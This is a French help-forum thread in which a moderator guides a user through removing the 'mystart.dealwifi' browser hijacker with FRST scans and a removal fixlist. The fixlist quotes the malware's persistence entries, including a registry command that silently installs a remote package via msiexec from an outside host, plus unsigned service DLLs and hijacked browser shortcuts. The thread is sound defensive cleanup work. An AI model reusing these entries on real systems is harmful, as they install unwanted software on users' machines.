Supprimer mystart.dealwifi
zirko123
Messages postés
60
Date d'inscription
Statut
Membre
Dernière intervention
-
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour, je voudrais me débarasser de mystart4dealwifi, j'ai utiliser plusieurs antimalware pour ca mais rien ne marche, est ce que vous avez déjà eu ce problème? autre chose, pkoi est ce que certains antispyware sont payants et d'autres pas?
Cyril
Cyril
A voir également:
- Supprimer mystart.dealwifi
- Supprimer rond bleu whatsapp - Guide
- Supprimer page word - Guide
- Supprimer pub youtube - Accueil - Streaming
- Fichier impossible à supprimer - Guide
- Supprimer compte instagram - Guide
4 réponses
Salut,
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
il faut lancer le scan et j'attends?
y'a rien sur mon bureau, en fait y'en a un seul et il est dans mes téléchargements, https://pjjoint.malekal.com/files.php?id=FRST_20170503_v15z11v5l8o14
il t'en faut 3?
il t'en faut 3?
sinon tout a l'heur quand j'ouvre mon ordi, avant que windows se lance, une page noir se lance, regardes la photo, https://pjjoint.malekal.com/files.php?id=20170503_t9o9t9g10c5
j'ai bien lancer le nettoyage mais y'a toujours le virus
j'ai bien lancer le nettoyage mais y'a toujours le virus
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Spybot - Search & Destroy
SpyHunter 4
Web Companion
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Veuillez appuyer sur une touche pour continuer la désinfection...
puis programmes et fonctionnalités.
Spybot - Search & Destroy
SpyHunter 4
Web Companion
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-91746520-757560440-668047797-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YRkU1RUZQNTRSNkE5NkF1Mjq2FdM4NWM8RjM1NTkxNq%3D%3D /q [Pays US - 104.24.101.133]
CHR Extension: (Bing) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-04-27]
S4 SNARE; C:\Users\admin\AppData\Local\SNARE\Snare.dll [687616 2017-05-03] () [File not signed]
R2 WinSAPSvc; C:\Users\admin\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [File not signed] <==== ATTENTION
S2 MicrosoftCRLSrv; C:\ProgramData\Microsoft\IdentityCRL\production\ppcrlconfig617.dll [X]
S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 FirefoxU; C:\Program Files\Firefox\bin\FirefoxUpdate.exe [X] <==== ATTENTION
S2 Kitty; C:\Users\admin\AppData\Local\Kitty\Kitty.dll [X] <==== ATTENTION
2017-05-03 13:27 - 2017-05-03 13:27 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-02 23:21 - 2017-05-02 23:21 - 60107896 _____ (Malwarebytes ) C:\Users\admin\Downloads\mb3-setup-consumer-3.0.6.1469-10103 (1).exe
2017-05-02 20:33 - 2017-05-02 21:24 - 00000194 _____ C:\Users\admin\Desktop\a faire.txt
2017-04-28 15:27 - 2017-04-28 15:27 - 00000000 ____D C:\Users\admin\AppData\Local\Cuptony
2017-04-28 15:26 - 2017-04-28 15:26 - 00000007 _____ C:\Windows\system32\81B5.tmp
2017-04-28 15:21 - 2017-05-02 15:49 - 00000000 ____D C:\Users\admin\AppData\Roaming\WinSAPSvc
2017-04-28 15:21 - 2017-04-28 15:21 - 00000000 ____D C:\Windows\psgo
2017-04-28 15:21 - 2017-04-28 15:21 - 00000000 ____D C:\Program Files\Cuptony
2017-04-27 20:40 - 2017-04-27 20:40 - 00000000 ____D C:\Program Files\Everness
2017-04-27 20:32 - 2017-05-02 20:48 - 00002195 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-27 18:25 - 2017-04-27 18:25 - 00000000 ____D C:\Users\admin\AppData\Local\Everness
2017-04-27 18:17 - 2017-05-02 15:48 - 00000000 ____D C:\Program Files\BiaoJi
2017-04-25 23:34 - 2017-04-13 17:30 - 00001310 _____ C:\Users\admin\Desktop\lettre.txt
2017-04-25 13:45 - 2017-04-25 13:45 - 00000000 _____ C:\Windows\system32\22
2017-04-25 12:04 - 2017-04-25 12:04 - 00000000 ____D C:\ProgramData\Apple
2017-04-25 12:03 - 2017-04-28 15:23 - 00000000 _____ C:\Windows\system32\33
2017-04-25 12:03 - 2017-04-28 15:23 - 00000000 _____ C:\Windows\system32\11
2017-04-25 12:00 - 2017-04-28 15:20 - 00000000 ____D C:\Program Files\AlphaGo
2017-04-25 12:00 - 2017-04-28 15:19 - 00000000 ____D C:\Program Files\MK
2017-04-23 11:24 - 2017-04-23 11:45 - 00013754 ____H C:\Users\admin\Desktop\~WRL1051.tmp
2017-04-18 09:23 - 2017-04-18 09:23 - 60107896 _____ (Malwarebytes ) C:\Users\admin\Downloads\mb3-setup-consumer-3.0.6.1469-10103.exe
2017-04-18 09:20 - 2017-04-18 09:20 - 04089296 _____ C:\Users\admin\Downloads\adwcleaner_6.045.exe
2017-04-18 01:19 - 2017-04-18 01:19 - 00000000 ____D C:\Users\admin\AppData\Local\ASHelper
2017-04-17 21:06 - 2017-04-17 21:06 - 00000000 ____D C:\Users\admin\AppData\Local\Eastness
2017-04-17 21:06 - 2017-04-17 21:06 - 00000000 ____D C:\Program Files\temp
2017-04-17 21:03 - 2017-04-17 21:03 - 00000000 ____D C:\Users\admin\AppData\Roaming\Firefox
2017-04-17 21:03 - 2017-04-17 21:03 - 00000000 ____D C:\Users\admin\AppData\Local\Firefox
2017-04-17 21:02 - 2017-05-03 13:27 - 00000000 ____D C:\Program Files\Firefox
2017-04-17 21:02 - 2017-04-30 07:52 - 00000000 ____D C:\Users\admin\AppData\Local\Kitty
2017-04-17 21:02 - 2017-04-25 12:02 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-17 21:01 - 2017-05-02 15:49 - 00000000 ____D C:\Users\admin\AppData\Local\SNARE
2017-04-17 21:01 - 2017-04-28 15:25 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-17 21:01 - 2017-04-17 21:01 - 00000000 ____D C:\Program Files\MIO
HKU\S-1-5-21-91746520-757560440-668047797-1000\...\ChromeHTML: -> "C:\Program Files\Cuptony\Application\chrome.exe" "%1" <==== ATTENTION
C:\Program Files\Cuptony
Task: {10EDE2BC-9839-490C-B802-235F2F77EAC5} - \PowerWord-SCT-JT -> No File <==== ATTENTION
Task: {E19812B3-DA84-45D5-8082-478031E7F06C} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Veuillez appuyer sur une touche pour continuer la désinfection...